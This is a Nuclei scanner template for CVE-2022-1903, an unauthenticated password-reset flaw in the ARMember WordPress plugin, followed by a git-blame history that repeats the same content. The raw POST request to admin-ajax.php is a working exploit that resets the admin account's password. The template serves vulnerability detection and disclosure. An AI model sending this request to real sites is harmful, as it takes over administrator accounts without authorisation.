nuclei-templates/http/cves/2022/CVE-2022-1903.yaml

id: CVE-2022-1903

info:
  name: ARMember < 3.4.8 - Unauthenticated Admin Account Takeover
  author: theamanrawat
  severity: high
  description: |
    The ARMember WordPress plugin before 3.4.8 is vulnerable to account takeover (even the administrator) due to missing nonce and authorization checks in an AJAX action available to unauthenticated users, allowing them to change the password of arbitrary users by knowing their username.
  impact: |
    An attacker can gain unauthorized access to the admin account, potentially leading to further compromise of the system.
  remediation: Fixed in version 3.4.8
  reference:
    - https://wpscan.com/vulnerability/28d26aa6-a8db-4c20-9ec7-39821c606a08
    - https://wordpress.org/plugins/armember-membership/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1903
    - https://github.com/SYRTI/POC_to_review
    - https://github.com/WhooAmii/POC_to_review
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2022-1903
    cwe-id: CWE-862
    epss-score: 0.62377
    epss-percentile: 0.97556
    cpe: cpe:2.3:a:armemberplugin:armember:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: armemberplugin
    product: armember
    framework: wordpress
  tags: cve,cve2022,account-takeover,wpscan,wordpress,wp-plugin,wp,armember-membership,unauthenticated,armemberplugin

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=arm_shortcode_form_ajax_action&user_pass={{randstr}}&repeat_pass={{randstr}}&arm_action=change-password&key2=x&action2=rp&login2=admin

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Your Password has been reset"
          - "arm_success_msg"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a00463044022044cb02a28cb0ec0475641652da514e0cc32acedfb179c753ce87366cebfcf5c3022049f84e02f2747ca99552059b7f2882db7984a749ec4f2c04c64c552c65c9fae9:922c64590222798bb761d5b6d8e72950
templates added 2023-04-21 08:56:01 +00:00			`id: CVE-2022-1903`

			`info:`
			`name: ARMember < 3.4.8 - Unauthenticated Admin Account Takeover`
			`author: theamanrawat`
			`severity: high`
			`description: \|`
			`The ARMember WordPress plugin before 3.4.8 is vulnerable to account takeover (even the administrator) due to missing nonce and authorization checks in an AJAX action available to unauthenticated users, allowing them to change the password of arbitrary users by knowing their username.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`An attacker can gain unauthorized access to the admin account, potentially leading to further compromise of the system.`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`remediation: Fixed in version 3.4.8`
templates added 2023-04-21 08:56:01 +00:00			`reference:`
			`- https://wpscan.com/vulnerability/28d26aa6-a8db-4c20-9ec7-39821c606a08`
			`- https://wordpress.org/plugins/armember-membership/`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-1903`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`- https://github.com/SYRTI/POC_to_review`
			`- https://github.com/WhooAmii/POC_to_review`
templates added 2023-04-21 08:56:01 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 8.1`
			`cve-id: CVE-2022-1903`
			`cwe-id: CWE-862`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`epss-score: 0.62377`
			`epss-percentile: 0.97556`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`cpe: cpe:2.3:a:armemberplugin:armember::::::wordpress::*`
templates added 2023-04-21 08:56:01 +00:00			`metadata:`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: armemberplugin`
			`product: armember`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`framework: wordpress`
tags enhancements 2023-12-05 09:50:33 +00:00			`tags: cve,cve2022,account-takeover,wpscan,wordpress,wp-plugin,wp,armember-membership,unauthenticated,armemberplugin`
templates added 2023-04-21 08:56:01 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
templates added 2023-04-21 08:56:01 +00:00			`- raw:`
			`- \|`
			`POST /wp-admin/admin-ajax.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`action=arm_shortcode_form_ajax_action&user_pass={{randstr}}&repeat_pass={{randstr}}&arm_action=change-password&key2=x&action2=rp&login2=admin`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "Your Password has been reset"`
			`- "arm_success_msg"`
			`condition: and`

			`- type: word`
			`part: header`
			`words:`
			`- "text/html"`

			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Tue Jan 30 06:46:18 UTC 2024] :robot: 2024-01-30 06:46:18 +00:00			`# digest: 490a00463044022044cb02a28cb0ec0475641652da514e0cc32acedfb179c753ce87366cebfcf5c3022049f84e02f2747ca99552059b7f2882db7984a749ec4f2c04c64c552c65c9fae9:922c64590222798bb761d5b6d8e72950`